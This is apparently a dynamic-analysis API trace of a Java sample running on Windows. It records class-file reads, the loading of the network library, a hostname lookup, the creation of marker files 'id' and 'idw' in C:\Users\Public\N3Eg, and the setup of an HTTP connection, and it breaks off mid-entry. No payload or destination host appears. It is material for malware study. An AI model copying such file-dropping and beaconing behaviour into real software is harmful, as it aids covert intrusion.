[0018.434] strlen (_Str="") returned 0x0 [0018.434] strlen (_Str="") returned 0x0 [0018.434] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.434] strlen (_Str="@A") returned 0x2 [0018.434] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.435] strlen (_Str="") returned 0x0 [0018.435] strlen (_Str="") returned 0x0 [0018.435] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.435] strlen (_Str="AA") returned 0x2 [0018.435] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection") returned 0 [0018.435] strlen (_Str="") returned 0x0 [0018.436] strlen (_Str="java/net/URLDecoder") returned 0x13 [0018.437] strlen (_Str="java/net/URLDecoder.class") returned 0x19 [0018.437] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ed2f5, lpNewFilePointer=0x0, dwMoveMethod=0x4bde38 | out: lpNewFilePointer=0x0) returned 1 [0018.437] ReadFile (in: hFile=0xd4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bde08, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4bde08*=0xa0, lpOverlapped=0x0) returned 1 [0018.437] strlen (_Str="java/net/URLDecoder.class") returned 0x19 [0018.437] strcpy (in: _Dest=0x4bdf3c, _Source="java/net/URLDecoder.class" | out: _Dest="java/net/URLDecoder.class") returned="java/net/URLDecoder.class" [0018.437] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16fb872, lpNewFilePointer=0x0, dwMoveMethod=0x4bda3c | out: lpNewFilePointer=0x0) returned 1 [0018.437] ReadFile (in: hFile=0xd4, lpBuffer=0x4bda74, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bda0c, lpOverlapped=0x0 | out: lpBuffer=0x4bda74*, lpNumberOfBytesRead=0x4bda0c*=0x1e, lpOverlapped=0x0) returned 1 [0018.438] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16fb8a9, lpNewFilePointer=0x0, dwMoveMethod=0x4bda78 | out: lpNewFilePointer=0x0) returned 1 [0018.438] ReadFile (in: hFile=0xd4, lpBuffer=0xb7fea0, nNumberOfBytesToRead=0x7fc, lpNumberOfBytesRead=0x4bda48, lpOverlapped=0x0 | out: lpBuffer=0xb7fea0*, lpNumberOfBytesRead=0x4bda48*=0x7fc, lpOverlapped=0x0) returned 1 [0018.439] strlen (_Str="java/net/URLEncoder.class") returned 0x19 [0018.439] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ed33c, lpNewFilePointer=0x0, dwMoveMethod=0x4be08c | out: lpNewFilePointer=0x0) returned 1 [0018.439] ReadFile (in: hFile=0xd4, lpBuffer=0xacb010, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be05c, lpOverlapped=0x0 | out: lpBuffer=0xacb010*, lpNumberOfBytesRead=0x4be05c*=0xa0, lpOverlapped=0x0) returned 1 [0018.439] strlen (_Str="java/net/URLEncoder.class") returned 0x19 [0018.439] strcpy (in: _Dest=0x4be190, _Source="java/net/URLEncoder.class" | out: _Dest="java/net/URLEncoder.class") returned="java/net/URLEncoder.class" [0018.439] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16fc0a5, lpNewFilePointer=0x0, dwMoveMethod=0x4bdc90 | out: lpNewFilePointer=0x0) returned 1 [0018.439] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdcc8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdc60, lpOverlapped=0x0 | out: lpBuffer=0x4bdcc8*, lpNumberOfBytesRead=0x4bdc60*=0x1e, lpOverlapped=0x0) returned 1 [0018.439] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16fc0dc, lpNewFilePointer=0x0, dwMoveMethod=0x4bdccc | out: lpNewFilePointer=0x0) returned 1 [0018.439] ReadFile (in: hFile=0xd4, lpBuffer=0xb7fea0, nNumberOfBytesToRead=0x977, lpNumberOfBytesRead=0x4bdc9c, lpOverlapped=0x0 | out: lpBuffer=0xb7fea0*, lpNumberOfBytesRead=0x4bdc9c*=0x977, lpOverlapped=0x0) returned 1 [0018.444] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6d80, lpNewFilePointer=0x0, dwMoveMethod=0x4be238 | out: lpNewFilePointer=0x0) returned 1 [0018.444] ReadFile (in: hFile=0x1c4, lpBuffer=0x1501b108, nNumberOfBytesToRead=0x5b, lpNumberOfBytesRead=0x4be208, lpOverlapped=0x0 | out: lpBuffer=0x1501b108*, lpNumberOfBytesRead=0x4be208*=0x5b, lpOverlapped=0x0) returned 1 [0018.446] strlen (_Str="sun/net/www/protocol/file/Handler") returned 0x21 [0018.456] calloc (_Count=0x1, _Size=0x38) returned 0xb9a330 [0018.457] strlen (_Str="sun/misc/URLClassPath$Loader$1.class") returned 0x24 [0018.457] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3385362, lpNewFilePointer=0x0, dwMoveMethod=0x4be59c | out: lpNewFilePointer=0x0) returned 1 [0018.457] ReadFile (in: hFile=0xd4, lpBuffer=0xacb160, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be56c, lpOverlapped=0x0 | out: lpBuffer=0xacb160*, lpNumberOfBytesRead=0x4be56c*=0xa0, lpOverlapped=0x0) returned 1 [0018.457] strlen (_Str="sun/misc/URLClassPath$Loader$1.class") returned 0x24 [0018.457] strcpy (in: _Dest=0x4be6a0, _Source="sun/misc/URLClassPath$Loader$1.class" | out: _Dest="sun/misc/URLClassPath$Loader$1.class") returned="sun/misc/URLClassPath$Loader$1.class" [0018.457] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d2c32, lpNewFilePointer=0x0, dwMoveMethod=0x4be1a0 | out: lpNewFilePointer=0x0) returned 1 [0018.457] ReadFile (in: hFile=0xd4, lpBuffer=0x4be1d8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be170, lpOverlapped=0x0 | out: lpBuffer=0x4be1d8*, lpNumberOfBytesRead=0x4be170*=0x1e, lpOverlapped=0x0) returned 1 [0018.459] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d2c74, lpNewFilePointer=0x0, dwMoveMethod=0x4be1dc | out: lpNewFilePointer=0x0) returned 1 [0018.459] ReadFile (in: hFile=0xd4, lpBuffer=0xb5fe10, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x4be1ac, lpOverlapped=0x0 | out: lpBuffer=0xb5fe10*, lpNumberOfBytesRead=0x4be1ac*=0x485, lpOverlapped=0x0) returned 1 [0018.461] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6d80, lpNewFilePointer=0x0, dwMoveMethod=0x4be1a8 | out: lpNewFilePointer=0x0) returned 1 [0018.461] ReadFile (in: hFile=0x1c4, lpBuffer=0x1501b170, nNumberOfBytesToRead=0x5b, lpNumberOfBytesRead=0x4be178, lpOverlapped=0x0 | out: lpBuffer=0x1501b170*, lpNumberOfBytesRead=0x4be178*=0x5b, lpOverlapped=0x0) returned 1 [0018.464] calloc (_Count=0x1, _Size=0x38) returned 0xb9a370 [0018.466] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x19b5, lpNewFilePointer=0x0, dwMoveMethod=0x4bcaec | out: lpNewFilePointer=0x0) returned 1 [0018.466] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcb24, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bcabc, lpOverlapped=0x0 | out: lpBuffer=0x4bcb24*, lpNumberOfBytesRead=0x4bcabc*=0x1e, lpOverlapped=0x0) returned 1 [0018.466] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x19ea, lpNewFilePointer=0x0, dwMoveMethod=0x4bcb28 | out: lpNewFilePointer=0x0) returned 1 [0018.466] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcaf8, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcaf8*=0x2000, lpOverlapped=0x0) returned 1 [0018.469] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x39ea, lpNewFilePointer=0x0, dwMoveMethod=0x4bcb28 | out: lpNewFilePointer=0x0) returned 1 [0018.469] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcaf8, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcaf8*=0x2000, lpOverlapped=0x0) returned 1 [0018.471] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x59ea, lpNewFilePointer=0x0, dwMoveMethod=0x4bcb28 | out: lpNewFilePointer=0x0) returned 1 [0018.471] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0xf27, lpNumberOfBytesRead=0x4bcaf8, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcaf8*=0xf27, lpOverlapped=0x0) returned 1 [0018.493] strlen (_Str="java/lang/Object") returned 0x10 [0018.495] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.495] strlen (_Str="java/io/IOException") returned 0x13 [0018.496] strlen (_Str="java/io/InputStream") returned 0x13 [0018.496] strlen (_Str="java/io/FileInputStream") returned 0x17 [0018.496] strlen (_Str="java/io/BufferedInputStream") returned 0x1b [0018.497] strlen (_Str="java/lang/Integer") returned 0x11 [0018.498] strlen (_Str="java/lang/String") returned 0x10 [0018.498] strlen (_Str="java/lang/Boolean") returned 0x11 [0018.499] strlen (_Str="java/lang/reflect/Method") returned 0x18 [0018.503] strlen (_Str="java/net/InetAddress") returned 0x14 [0018.509] strlen (_Str="") returned 0x0 [0018.509] strlen (_Str=".dll") returned 0x4 [0018.509] strlen (_Str="") returned 0x0 [0018.509] strlen (_Str=".dll") returned 0x4 [0018.509] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0018.509] strlen (_Str="net.dll") returned 0x7 [0018.509] strcpy (in: _Dest=0xb9b4c0, _Source="net.dll" | out: _Dest="net.dll") returned="net.dll" [0018.509] strlen (_Str="net.dll") returned 0x7 [0018.509] strlen (_Str="net") returned 0x3 [0018.510] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0018.510] strncpy (in: _Dest=0xb5ef80, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoadhrowable") returned="_JNI_OnLoadhrowable" [0018.510] strcat (in: _Dest=0xb5ef80, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0018.510] strcat (in: _Dest=0xb5ef80, _Source="net" | out: _Dest="_JNI_OnLoad_net") returned="_JNI_OnLoad_net" [0018.510] strcat (in: _Dest=0xb5ef80, _Source="@8" | out: _Dest="_JNI_OnLoad_net@8") returned="_JNI_OnLoad_net@8" [0018.510] strlen (_Str="net") returned 0x3 [0018.510] strlen (_Str="JNI_OnLoad") returned 0xa [0018.510] strcpy (in: _Dest=0xb68068, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0018.510] strcat (in: _Dest=0xb68068, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0018.510] strcat (in: _Dest=0xb68068, _Source="net" | out: _Dest="JNI_OnLoad_net") returned="JNI_OnLoad_net" [0018.510] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned 0x2d [0018.510] wcscpy (in: _Dest=0xb9ff40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll" [0018.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll", nBufferLength=0x9, lpBuffer=0x4be610, lpFilePart=0x4be60c | out: lpBuffer="", lpFilePart=0x4be60c) returned 0x2e [0018.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll", fInfoLevelId=0x0, lpFileInformation=0x4be600 | out: lpFileInformation=0x4be600) returned 1 [0018.511] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin") returned 0x25 [0018.511] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned 0x2d [0018.511] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll", lpFindFileData=0x4bdf74 | out: lpFindFileData=0x4bdf74) returned 0x24f930 [0018.512] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.512] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin") returned 0x25 [0018.512] wcslen (_String="net.dll") returned 0x7 [0018.512] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned 0x2d [0018.541] _malloc_crt () returned 0xb9ff40 [0018.541] __dllonexit () returned 0x68e1463c [0018.541] __dllonexit () returned 0x7151463c [0018.542] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4bdc14 | out: lpWSAData=0x4bdc14) returned 0 [0018.542] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0018.542] strcpy (in: _Dest=0xb68068, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0018.542] socket (af=23, type=1, protocol=0) returned 0x1cc [0018.596] closesocket (s=0x1cc) returned 0 [0018.603] strlen (_Str="java/net/Inet6AddressImpl") returned 0x19 [0018.608] gethostname (in: name=0x4bf324, namelen=256 | out: name="N3EErvtwsM") returned 0 [0018.724] strlen (_Str="N3EErvtwsM") returned 0xa [0018.734] getaddrinfo (in: pNodeName="N3EErvtwsM", pServiceName=0x0, pHints=0x4bf358, ppResult=0x4bf380 | out: ppResult=0x4bf380) returned 0 [0018.890] htonl (hostlong=0xe400a8c0) returned 0xc0a800e4 [0018.890] FreeAddrInfoW (pAddrInfo=0x25ad60) [0018.898] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security") returned 0x3c [0018.898] wcscpy (in: _Dest=0x1505c9b0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security" [0018.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security", nBufferLength=0x9, lpBuffer=0x4be0e0, lpFilePart=0x4be0dc | out: lpBuffer="", lpFilePart=0x4be0dc) returned 0x3d [0018.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security", fInfoLevelId=0x0, lpFileInformation=0x4be0d0 | out: lpFileInformation=0x4be0d0) returned 1 [0018.902] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security") returned 0x3c [0018.902] wcscpy (in: _Dest=0x1505c928, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security" [0018.902] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_92\\lib\\security\\java.security"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0018.905] ReadFile (in: hFile=0x290, lpBuffer=0x4bbf24, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bbeec, lpOverlapped=0x0 | out: lpBuffer=0x4bbf24*, lpNumberOfBytesRead=0x4bbeec*=0x2000, lpOverlapped=0x0) returned 1 [0018.913] ReadFile (in: hFile=0x290, lpBuffer=0x4bbef4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bbebc, lpOverlapped=0x0 | out: lpBuffer=0x4bbef4*, lpNumberOfBytesRead=0x4bbebc*=0x2000, lpOverlapped=0x0) returned 1 [0018.916] ReadFile (in: hFile=0x290, lpBuffer=0x4bbef4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bbebc, lpOverlapped=0x0 | out: lpBuffer=0x4bbef4*, lpNumberOfBytesRead=0x4bbebc*=0x2000, lpOverlapped=0x0) returned 1 [0018.917] ReadFile (in: hFile=0x290, lpBuffer=0x4bbef4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bbebc, lpOverlapped=0x0 | out: lpBuffer=0x4bbef4*, lpNumberOfBytesRead=0x4bbebc*=0x999, lpOverlapped=0x0) returned 1 [0018.917] GetFileType (hFile=0x290) returned 0x1 [0018.917] SetFilePointerEx (in: hFile=0x290, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf6c | out: lpNewFilePointer=0x0) returned 1 [0018.917] GetFileSizeEx (in: hFile=0x290, lpFileSize=0x4bdf90 | out: lpFileSize=0x4bdf90*=27033) returned 1 [0018.917] ReadFile (in: hFile=0x290, lpBuffer=0x4bbef4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bbebc, lpOverlapped=0x0 | out: lpBuffer=0x4bbef4*, lpNumberOfBytesRead=0x4bbebc*=0x0, lpOverlapped=0x0) returned 1 [0018.918] CloseHandle (hObject=0x290) returned 1 [0018.932] strlen (_Str="java/lang/StringBuilder") returned 0x17 [0018.939] strlen (_Str="java/io/File") returned 0xc [0018.943] wcslen (_String="C:\\Program Files (x86)") returned 0x16 [0018.943] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Program Files (x86)" | out: _Dest="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0018.943] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x9, lpBuffer=0x4bf410, lpFilePart=0x4bf40c | out: lpBuffer="", lpFilePart=0x4bf40c) returned 0x17 [0018.943] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)", fInfoLevelId=0x0, lpFileInformation=0x4bf400 | out: lpFileInformation=0x4bf400) returned 0 [0018.943] GetLastError () returned 0x2 [0018.943] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0018.944] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0018.944] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf3e0, lpFilePart=0x4bf3dc | out: lpBuffer="", lpFilePart=0x4bf3dc) returned 0x15 [0018.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf3d0 | out: lpFileInformation=0x4bf3d0) returned 0 [0018.944] GetLastError () returned 0x2 [0018.944] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0018.944] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0018.944] CreateDirectoryW (lpPathName="C:\\Users\\Public\\N3Eg" (normalized: "c:\\users\\public\\n3eg"), lpSecurityAttributes=0x0) returned 1 [0018.945] wcslen (_String="C:\\Users\\Public\\N3Eg\\id") returned 0x17 [0018.945] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\id" | out: _Dest="C:\\Users\\Public\\N3Eg\\id") returned="C:\\Users\\Public\\N3Eg\\id" [0018.945] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg\\id", nBufferLength=0x9, lpBuffer=0x4bf410, lpFilePart=0x4bf40c | out: lpBuffer="", lpFilePart=0x4bf40c) returned 0x18 [0018.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg\\id", fInfoLevelId=0x0, lpFileInformation=0x4bf400 | out: lpFileInformation=0x4bf400) returned 0 [0018.945] GetLastError () returned 0x2 [0018.946] strlen (_Str="java/io/FileWriter") returned 0x12 [0018.953] wcslen (_String="C:\\Users\\Public\\N3Eg\\id") returned 0x17 [0018.954] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\id" | out: _Dest="C:\\Users\\Public\\N3Eg\\id") returned="C:\\Users\\Public\\N3Eg\\id" [0018.954] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\id" (normalized: "c:\\users\\public\\n3eg\\id"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0018.958] WriteFile (in: hFile=0x290, lpBuffer=0x4bd320*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x4bd2d0, lpOverlapped=0x0 | out: lpBuffer=0x4bd320*, lpNumberOfBytesWritten=0x4bd2d0, lpOverlapped=0x0) returned 1 [0018.960] CloseHandle (hObject=0x290) returned 1 [0018.961] wcslen (_String="C:\\Users\\Public\\N3Eg\\idw") returned 0x18 [0018.961] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\idw" | out: _Dest="C:\\Users\\Public\\N3Eg\\idw") returned="C:\\Users\\Public\\N3Eg\\idw" [0018.962] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\idw" (normalized: "c:\\users\\public\\n3eg\\idw"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0018.963] WriteFile (in: hFile=0x290, lpBuffer=0x4bd320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4bd2d0, lpOverlapped=0x0 | out: lpBuffer=0x4bd320*, lpNumberOfBytesWritten=0x4bd2d0, lpOverlapped=0x0) returned 1 [0018.964] CloseHandle (hObject=0x290) returned 1 [0018.973] strlen (_Str="java/net/URL") returned 0xc [0018.974] strlen (_Str="sun/net/www/protocol/http/Handler") returned 0x21 [0018.977] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection.class") returned 0x31 [0018.977] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338995a, lpNewFilePointer=0x0, dwMoveMethod=0x4beaf4 | out: lpNewFilePointer=0x0) returned 1 [0018.977] ReadFile (in: hFile=0xd4, lpBuffer=0xacb2b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4beac4, lpOverlapped=0x0 | out: lpBuffer=0xacb2b0*, lpNumberOfBytesRead=0x4beac4*=0xa0, lpOverlapped=0x0) returned 1 [0018.977] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection.class") returned 0x31 [0018.978] strcpy (in: _Dest=0x4bebf8, _Source="sun/net/www/protocol/http/HttpURLConnection.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection.class") returned="sun/net/www/protocol/http/HttpURLConnection.class" [0018.978] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2543774, lpNewFilePointer=0x0, dwMoveMethod=0x4be6f8 | out: lpNewFilePointer=0x0) returned 1 [0018.978] ReadFile (in: hFile=0xd4, lpBuffer=0x4be730, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be6c8, lpOverlapped=0x0 | out: lpBuffer=0x4be730*, lpNumberOfBytesRead=0x4be6c8*=0x1e, lpOverlapped=0x0) returned 1 [0018.980] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25437c3, lpNewFilePointer=0x0, dwMoveMethod=0x4be734 | out: lpNewFilePointer=0x0) returned 1 [0018.980] ReadFile (in: hFile=0xd4, lpBuffer=0x1505cfa0, nNumberOfBytesToRead=0xaeb5, lpNumberOfBytesRead=0x4be704, lpOverlapped=0x0 | out: lpBuffer=0x1505cfa0*, lpNumberOfBytesRead=0x4be704*=0xaeb5, lpOverlapped=0x0) returned 1 [0019.047] strlen (_Str="sun/security/action/GetIntegerAction.class") returned 0x2a [0019.047] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3398433, lpNewFilePointer=0x0, dwMoveMethod=0x4be854 | out: lpNewFilePointer=0x0) returned 1 [0019.047] ReadFile (in: hFile=0xd4, lpBuffer=0xacb2b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be824, lpOverlapped=0x0 | out: lpBuffer=0xacb2b0*, lpNumberOfBytesRead=0x4be824*=0xa0, lpOverlapped=0x0) returned 1 [0019.047] strlen (_Str="sun/security/action/GetIntegerAction.class") returned 0x2a [0019.047] strcpy (in: _Dest=0x4be958, _Source="sun/security/action/GetIntegerAction.class" | out: _Dest="sun/security/action/GetIntegerAction.class") returned="sun/security/action/GetIntegerAction.class" [0019.047] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x270b1b1, lpNewFilePointer=0x0, dwMoveMethod=0x4be458 | out: lpNewFilePointer=0x0) returned 1 [0019.047] ReadFile (in: hFile=0xd4, lpBuffer=0x4be490, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be428, lpOverlapped=0x0 | out: lpBuffer=0x4be490*, lpNumberOfBytesRead=0x4be428*=0x1e, lpOverlapped=0x0) returned 1 [0019.054] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x270b1f9, lpNewFilePointer=0x0, dwMoveMethod=0x4be494 | out: lpNewFilePointer=0x0) returned 1 [0019.054] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x4be464, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be464*=0x320, lpOverlapped=0x0) returned 1 [0019.062] strlen (_Str="sun/util/logging/PlatformLogger$DefaultLoggerProxy") returned 0x32 [0019.063] strlen (_Str="sun/util/logging/PlatformLogger$JavaLoggerProxy") returned 0x2f [0019.065] strlen (_Str="java/util/logging/LoggingProxyImpl") returned 0x22 [0019.084] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$TunnelState.class") returned 0x3d [0019.084] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33898ef, lpNewFilePointer=0x0, dwMoveMethod=0x4be9f0 | out: lpNewFilePointer=0x0) returned 1 [0019.084] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be9c0, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4be9c0*=0xa0, lpOverlapped=0x0) returned 1 [0019.085] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$TunnelState.class") returned 0x3d [0019.085] strcpy (in: _Dest=0x4beaf4, _Source="sun/net/www/protocol/http/HttpURLConnection$TunnelState.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection$TunnelState.class") returned="sun/net/www/protocol/http/HttpURLConnection$TunnelState.class" [0019.085] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25432dc, lpNewFilePointer=0x0, dwMoveMethod=0x4be5f4 | out: lpNewFilePointer=0x0) returned 1 [0019.085] ReadFile (in: hFile=0xd4, lpBuffer=0x4be62c, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be5c4, lpOverlapped=0x0 | out: lpBuffer=0x4be62c*, lpNumberOfBytesRead=0x4be5c4*=0x1e, lpOverlapped=0x0) returned 1 [0019.086] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2543337, lpNewFilePointer=0x0, dwMoveMethod=0x4be630 | out: lpNewFilePointer=0x0) returned 1 [0019.086] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x43d, lpNumberOfBytesRead=0x4be600, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be600*=0x43d, lpOverlapped=0x0) returned 1 [0019.087] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$2.class") returned 0x33 [0019.087] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3389498, lpNewFilePointer=0x0, dwMoveMethod=0x4beab0 | out: lpNewFilePointer=0x0) returned 1 [0019.087] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bea80, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4bea80*=0xa0, lpOverlapped=0x0) returned 1 [0019.088] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$2.class") returned 0x33 [0019.088] strcpy (in: _Dest=0x4bebb4, _Source="sun/net/www/protocol/http/HttpURLConnection$2.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection$2.class") returned="sun/net/www/protocol/http/HttpURLConnection$2.class" [0019.088] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253fa34, lpNewFilePointer=0x0, dwMoveMethod=0x4be6b4 | out: lpNewFilePointer=0x0) returned 1 [0019.088] ReadFile (in: hFile=0xd4, 